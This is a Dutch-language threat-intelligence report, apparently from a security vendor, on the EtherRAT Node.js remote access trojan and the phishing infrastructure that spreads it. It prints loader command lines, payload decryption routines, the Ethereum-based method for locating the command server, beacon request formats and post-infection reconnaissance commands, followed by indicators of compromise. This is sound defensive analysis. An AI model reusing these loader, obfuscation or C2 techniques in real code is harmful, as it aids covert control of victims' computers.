Tijdens onze recente activiteiten op het gebied van dreigingsonderzoek hebben we ontdekt dat EtherRAT-malware werd verspreid via een website met een vreemde startpagina. Via deze startpagina hebben we een uitgebreide kwaadaardige infrastructuur ontdekt die malware, schadelijke documenten, software voor externe toegang tot desktops en phishingpagina’s verspreidt.
EtherRAT is een in Node.js ontwikkelde RAT waarmee een aanvaller volledige controle over de computer kan krijgen en willekeurige code kan uitvoeren die door de Command and Control (C2)-server wordt teruggestuurd. De malware maakt gebruik van de Ethereum-blockchain om de C2-server te bereiken; vandaar het woord „Ether“ in de naam. EtherRAT wordt doorgaans verspreid via MSI-, PowerShell- of JavaScript-scripts.
Een open directory die EtherRAT verspreidt: waar het allemaal begon
Tijdens onze zoektocht naar bedreigingen hebben we een openbare map ontdekt waarin MSI-installatieprogramma’s en PowerShell-scripts werden verspreid, die uiteindelijk EtherRAT verspreidden. In de geanalyseerde gevallen werden de PowerShell-scripts en MSI-installatieprogramma’s verspreid vanuit een map met de naam „/install“. De versies hebben een oplopend nummer, variërend van v1 tot v10.
De vernieuwde startpagina trok onze aandacht en zette ons ertoe aan de campagne nader te bekijken.
Bij het analyseren van domeinen en bijbehorende IP-adressen die verband houden met de EtherRAT-distributie, hebben we andere soortgelijke startpagina’s ontdekt met een thema dat doet denken aan hacking. Deze leken deel uit te maken van een grotere distributieketen, die ook phishing, software voor externe bediening en andere malware verspreidt. Deze websites bevatten doorgaans verschillende mappen met malware en phishinggerelateerde inhoud, en wat er wordt weergegeven, hangt af van de specifieke infectieketen.
Verschillende websites die naar dezelfde IP-adressen verwijzen, toonden voorheen pagina’s met informatie over nepbedrijven of standaardtemplates. Het gebruik van deze nieuwe pagina’s zou daarom een manier kunnen zijn om detectie door geautomatiseerde scanners of onderzoekers te bemoeilijken. Hieronder volgen enkele van de startpagina’s die we hebben gevonden:
EtherRAT is een interessante RAT, omdat het uit slechts enkele regels code bestaat en het mogelijk maakt om willekeurige code uit te voeren die door de C2-server wordt teruggestuurd. Bovendien zorgt het gebruik van de Ethereum-blockchain om de C2-server te bereiken ervoor dat het beter bestand is tegen het uitschakelen van de infrastructuur.
Technische analyse van EtherRAT
De gedetecteerde websites verspreiden doorgaans een MSI- of PowerShell-script met de versienaam, zoals v1.msi, v2.ps1, enzovoort.
MSI Loader
Het MSI-bestand „v9.msi“ bevat drie onderdelen:
| MSI-bestandsnaam | Beschrijving |
| KmPuGimn.cmd | BAT-lancer |
| cDQMlQAru0.xml | Eerste JScript-loader |
| MRaQCipBIZeiZNx.log | Versleutelde EtherRAT |
Wanneer het MSI-bestand wordt uitgevoerd, wordt het bestand „KmPuGimn.cmd” gestart:
conhost --headless cmd /c "KmPuGimn.cmd" Dit versleutelde BAT-bestand voert verschillende bewerkingen uit:
- Pakt de overige bestanden uit in een willekeurige map in %LOCALAPPDATA%.
- Wordt opnieuw uitgevoerd via:
- %SystemRoot%\System32\conhost.exe –headless %SystemRoot%\System32\cmd.exe /c call “C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd” nKWa
- Voert het commando „where node“ uit om een bestaande installatie te vinden.
- Installeert Node.js als het niet wordt gevonden
- Gebruikt “curl -sLo” om Node.js van de officiële website te downloaden.
- Uitpakken naar de installatiemap met “tar -xf”.
- Hernoemt de uitgepakte map naar „28Q75h“.
- Wordt herhaald totdat zowel „MRaQCipBIZeiZNx.log” als „cDQMlQAru0.xml” aanwezig zijn, waarna het volgende wordt uitgevoerd:
- conhost.exe –headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml
Het uitgevoerde bestand „cDQMlQAru0.xml“ is een loader die de ingebedde code met een XOR-functie ontsleutelt en deze vervolgens uitvoert met „vm.compileFunction“.
decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF 
De gedecodeerde code:
- Copies node.exe in “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”.
- Voegt een registersleutel toe voor permanente opslag met „conhost.exe –headless“.
- Ontcijfert „MRaQCipBIZeiZNx.log” en voert het uit met „_MJlLlt5.exe” als standaardinvoer.
Het decodeeralgoritme is een op maat gemaakte, stream-achtige decoderingsroute die is gebaseerd op XOR, byte-rotaties en een accumulator:
for e in range(len(data)):
byte = data[e]
g = prev
prev = byte
byte = (byte - g) & 0xff
byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff)
byte = si[byte]
byte = (byte - k[e % len(k)]) & 0xff
result[e] = byte De laatste stap is het inzetten van EtherRAT. Met EtherRAT kan de aanvaller:
- Willekeurige JavaScript-code uitvoeren die door de C2-server is ontvangen. Hierdoor kan de aanvaller nieuwe opdrachten uitvoeren, bewerkingen op bestanden en mappen uitvoeren, het register wijzigen en gegevens buitensluiten.
- Schaf een nieuwe C2-server aan die gebruikmaakt van de Ethereum-blockchain.
- Zichzelf opnieuw verbergen.
- Sla de logbestanden op onder de naam „svchost.log“.
De EtherRAT maakt gebruik van de JSON-RPC-methode „eth_call“ van Ethereum om de actieve C2-URL op te halen uit een smart contract op het Ethereum-mainnet.
De blockchainparameters zijn in dit geval:
- Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58
- Functieselector: 0x7d434425
- Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0
De URL’s die zijn geraadpleegd om het eindpunt van de C2-server te achterhalen, zijn:
- mainnet[.]gateway[.]tenderly[.]co
- rpc[.]flashbots[.]net/fast
- rpc[.]mevblocker[.]io
- eth-mainnet[.]public[.]blastapi[.]io
- ethereum-rpc[.]publicnode[.]com
- eth[.]drpc[.]org
- eth[.]merkle[.]io
Pollingverzoeken maken gebruik van willekeurige URL-patronen op basis van bepaalde parameters die in de code zijn gedefinieerd:
GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>
X-Bot-Server: <c2_url> In de geanalyseerde steekproef zijn de parameters:
- Build-ID: „6f816d80-0d6c-4384-9cd6-6b79965fc08f”
- ext: willekeurig gekozen uit „png”, „jpg”, „gif”, „css”, „ico”, „webp”.
- param: willekeurig gekozen uit “id”, “token”, “key”, “b”, “q”, “s”, “v”.
Na het opstarten stuurt de RAT zijn eigen broncode naar de C2-server. De C2 reageert met een nieuw versleutelde versie van het script, die weer naar de schijf wordt geschreven, waardoor bij elke uitvoering een nieuwe bestandshash wordt gegenereerd.
POST /api/[REOBF_PATH]/<victim-uuid>
Body: { "code": "<current_script_contents>", "build": "<build_id>" } Na de uitvoering van EtherRAT hebben we verschillende activiteiten waargenomen waarbij cmd.exe na de infectie werd gebruikt om de omgeving te verkennen. Bijvoorbeeld:
- powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name”
- reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
- powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain”
- powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain”
- cmd.exe /d /s /c "net session"
PowerShell-lader
De activiteiten die door de PowerShell-loaders worden uitgevoerd, lijken sterk op de laatste fase van het JS-script van het MSI-installatieprogramma:
- Installeert Node.js als dit nog niet aanwezig is.
- Maak de benodigde mappen aan.
- Ontcijfer de EtherRAT met een aangepast decoderingsalgoritme.
- Voer Node.js uit met conhost.exe en de gedecodeerde EtherRAT-payload.
We hebben enkele varianten van de PowerShell-loader ontdekt die op deze websites worden gehost; met name dat de namen van de functies en de decoderingsfuncties in de geanalyseerde PowerShell-scripts verschillen.
Het opsporen van de kwaadaardige infrastructuur
Toen we de verschillende websites met pagina’s rond het thema ‘hacking’ analyseerden, ontdekten we dat veel van deze sites in het verleden meerdere phishingpagina’s op bepaalde locaties hadden gehost. Bijvoorbeeld:
- /zht/sharep-redirect.html
- /bl/me.php
- /t/teams
- Windows.php
Het lijkt erop dat deze domeinen en IP-adressen in feite deel uitmaken van een veel grotere infrastructuur die malware, phishing, schadelijke documenten en software op afstand verspreidt. Het is mogelijk dat deze infrastructuren door meerdere cybercriminelen worden gedeeld, die afhankelijk van de specifieke campagne verschillende URL-eindpunten activeren.
Het is opvallend dat het merendeel van de domeinen die in het verleden aan deze kwaadaardige infrastructuur waren gekoppeld, ook een HTML-pagina weergeven die betrekking had op een dienst genaamd „Bulletproof Infrastructure“.
We hebben vastgesteld dat deze phishingcampagnes doorgaans beginnen met e-mails waarin documenten zijn bijgevoegd, zoals PDF- of Excel-bestanden. In deze documenten wordt de gebruiker gevraagd op een link te klikken om een ander document te bekijken. Hieronder staan twee voorbeelden van de phishingdocumenten die bij de e-mails zijn bijgevoegd:
Op deze phishingpagina’s wordt de gebruiker doorgaans gevraagd zijn e-mailadres in te voeren, waarna de infectieketen wordt voortgezet en er phishing- of malwarepagina’s worden verspreid. Hieronder staan enkele van de phishingpagina’s die binnen de kwaadaardige infrastructuur zijn gedetecteerd:
Door verkeerde configuraties kwamen de phishing-kits bloot te liggen
Tijdens het opsporen van schadelijke websites zijn we er een tegengekomen met een openbare map die een deel bevatte van de phishingkit die bij de campagnes werd gebruikt.
De geopende map bevatte verschillende mappen met code en pagina’s die verband hielden met de phishingcampagnes.
Bovendien waren sommige domeinen verkeerd geconfigureerd, waardoor het bestand „cl.zip“ kon worden gedownload, dat de broncode voor de „URL Cloaker“-pagina’s bevatte.
Indicatoren van inbreuk (IOC's)
IP's
82.165.65.244: kwaadaardige infrastructuur
185.221.216.121: kwaadaardige infrastructuur
43[.]163[.]233[.]166: kwaadaardige infrastructuur
40.160.238.30: kwaadaardige infrastructuur
159.89.227.204: kwaadaardige infrastructuur
57.128.31.168: kwaadaardige infrastructuur
Domeinen
ivorilla[.]cloud: verspreiding van EtherRAT
mx[.]nrlwz[.]com: verspreiding van EtherRAT
dn[.]eyqwj[.]com: verspreiding van EtherRAT
bi[.]mkrjcsw[.]com: verspreiding van EtherRAT
dorqen[.]casa: verspreiding van EtherRAT
kelvra[.]club: verspreiding van EtherRAT
cambioefectivo[.]com: EtherRAT C2
vabelles[.]com: EtherRAT C2
tranzed[.]org: EtherRAT C2
kibrisarazi[.]com: EtherRAT C2
aravisblog[.]com: EtherRAT C2
publicspeakingtip[.]org: EtherRAT C2
Dankwoords
- SharePoint-referentie:https://ironscales.com/threat-intelligence/no-macro-xlsx-shared-strings-aitm-redirect-credential-harvest
Voorkom bedreigingen voordat ze schade kunnen aanrichten.
Malwarebytes Browser Guard automatisch phishingpagina’s en schadelijke websites. Gratis en met één klik te installeren. Voeg het toe aan je browser →
